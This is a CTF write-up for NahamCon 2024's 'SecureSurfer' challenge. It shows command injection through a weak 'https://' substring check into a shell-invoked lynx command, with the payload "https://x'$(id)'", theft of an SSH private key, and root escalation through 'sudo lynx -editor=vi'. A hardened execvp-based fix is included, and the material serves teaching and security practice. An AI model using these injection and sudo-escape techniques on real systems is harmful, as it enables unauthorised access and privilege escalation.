Nahamcon 2024


Solved by : thewhiteh4t

  • we are provided with SSH access and a C source code file
  • it is a simple C program with a menu of switch cases and a surf function
  • the surf function passes our input, with very little validation, to lynx, a console-based browser
  • 5 of the options have predefined inputs, but in the 6th option we can provide our own input
    case 6:
        char url[1024];
        printf("Online URL: ");
        fgets(url, sizeof(url), stdin);
        url[strcspn(url, "\n")] = 0; // Remove newline character
        if (strstr(url, "https://") == NULL) {
            printf("\nWe are secure here at the SecureSurfer! You must use https:// !\n");
        } else {

    void surf(const char *url) {
        char command[512];
        sprintf(command, "/usr/local/bin/lynx --accept_all_cookies -cache=0 -restrictions=all '%s'", url);
        system("stty sane");
  • the only requirement is that our input contains the substring https:// somewhere (strstr), not that it starts with it
  • the URL is pasted into a shell command line inside single quotes, so we can inject commands by closing the quote and using $() :

  • so we have command injection, kind of
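The injection described above, side by side with a hardened surf(), as an added example (this is not code from the challenge or the writeup; the payload string, the helper names and the execvp-based replacement are my own). The vulnerable builder reproduces the challenge's command line, has_unquoted_substitution() shows why a closing single quote followed by $() is enough for /bin/sh to run a command, and the hardened side fixes both weaknesses: check_strict() requires https:// as a prefix rather than a substring, and build_lynx_argv()/surf_safe() hand the URL to lynx as a single argv element via execvp, so no shell ever parses it. Note that a stricter URL check alone does not stop the injection (the payload still starts with https://); what removes it is dropping system(). The original also uses sprintf into a 512-byte buffer while url[] holds up to 1023 characters, which is a separate overflow; the demo uses snprintf so it cannot overflow itself.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define LYNX "/usr/local/bin/lynx"

/* ---- vulnerable side: what the challenge's surf() does ---------------- */

/* Builds the same command line as the challenge. snprintf is used here only
 * so this demo cannot overflow; the original uses sprintf into command[512]
 * while url[] can hold 1023 characters. Returns 1 if nothing was truncated. */
int build_command_vuln(char *out, size_t outsz, const char *url)
{
    int n = snprintf(out, outsz,
        LYNX " --accept_all_cookies -cache=0 -restrictions=all '%s'", url);
    return n >= 0 && (size_t)n < outsz;
}

/* The challenge's check: "https://" may appear anywhere in the input. */
int check_weak(const char *url)
{
    return strstr(url, "https://") != NULL;
}

/* Walks the command line tracking single-quote state the way /bin/sh does
 * and reports whether "$(" occurs OUTSIDE single quotes, i.e. whether the
 * shell would perform command substitution on it. */
int has_unquoted_substitution(const char *cmd)
{
    int in_squote = 0;
    for (const char *p = cmd; *p; p++) {
        if (*p == '\'')
            in_squote = !in_squote;
        else if (!in_squote && p[0] == '$' && p[1] == '(')
            return 1;
    }
    return 0;
}

/* ---- hardened side ----------------------------------------------------- */

/* Scheme must be a prefix, not a substring, something must follow it, and
 * whitespace/control characters are rejected. */
int check_strict(const char *url)
{
    if (strncmp(url, "https://", 8) != 0 || url[8] == '\0')
        return 0;
    for (const char *p = url; *p; p++)
        if ((unsigned char)*p <= ' ' || *p == 0x7f)
            return 0;
    return 1;
}

/* Fills argv for execvp(): the URL becomes one argv element verbatim, so
 * quotes and $() inside it are never interpreted. Returns argc or -1. */
int build_lynx_argv(const char *url, const char *argv[], size_t cap)
{
    const char *fixed[] = { LYNX, "--accept_all_cookies", "-cache=0",
                            "-restrictions=all" };
    size_t nfixed = sizeof fixed / sizeof fixed[0];
    if (cap < nfixed + 2)
        return -1;
    for (size_t i = 0; i < nfixed; i++)
        argv[i] = fixed[i];
    argv[nfixed] = url;
    argv[nfixed + 1] = NULL;
    return (int)nfixed + 1;
}

/* fork+execvp replacement for system(); returns the child's exit status,
 * or -1 if the URL is rejected or the child could not be run/waited for. */
int surf_safe(const char *url)
{
    const char *argv[8];
    if (!check_strict(url) || build_lynx_argv(url, argv, 8) < 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(argv[0], (char *const *)argv);
        _exit(127);                 /* exec failed (e.g. lynx not installed) */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed payload in the shape the writeup describes: it contains
     * "https://", closes the single quote, then $() runs a command. */
    const char *payload = "https://x'$(id)'";
    char cmd[2048];
    build_command_vuln(cmd, sizeof cmd, payload);
    printf("command line: %s\n", cmd);
    printf("weak check passes:        %d\n", check_weak(payload));
    printf("sh would run $(id):       %d\n", has_unquoted_substitution(cmd));
    printf("strict check passes:      %d\n", check_strict(payload));
    const char *argv[8];
    build_lynx_argv(payload, argv, 8);
    printf("argv[4] passed verbatim:  %s\n", argv[4]);
    return 0;
}
```

Running it prints the exact command line the challenge would hand to system(), with $(id) sitting between two quoted segments, which is the whole bug in one line.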
  • now let’s try to drop to a shell :

  • we did get a shell, but command output is blank, maybe due to how lynx handles the terminal or some other reason; we can still explore, though, and the home directory of securesurfer contains a .ssh directory, so we look for a private key
securesurfer@securesurfer:~$ cat .ssh/
authorized_keys  id_ecdsa         id_ecdsa.pub
  • fortunately, lynx can read local files directly, so we can dump the key that way
  • now we can log in directly with the key, which skips the browser launched on login
chmod 600 id_ecdsa
ssh -p 31252 securesurfer@challenge.nahamcon.com -i id_ecdsa

  • after looking through lynx's options for some time, I came across a useful one :
-editor=EDITOR    enable edit mode with specified editor
  • vi is available on the target box, so we can run lynx with sudo, set vi as the editor, drop into edit mode, and launch a shell from vi; since lynx runs under sudo, so does vi and anything it spawns
  • we also need a local file for lynx to open, since edit mode works on a local file
touch a
sudo lynx -editor=vi a
  • once inside lynx we press e to enter edit mode, at which point vi takes over
  • and now we can simply use the following to get a shell :

Published on : 28 May 2024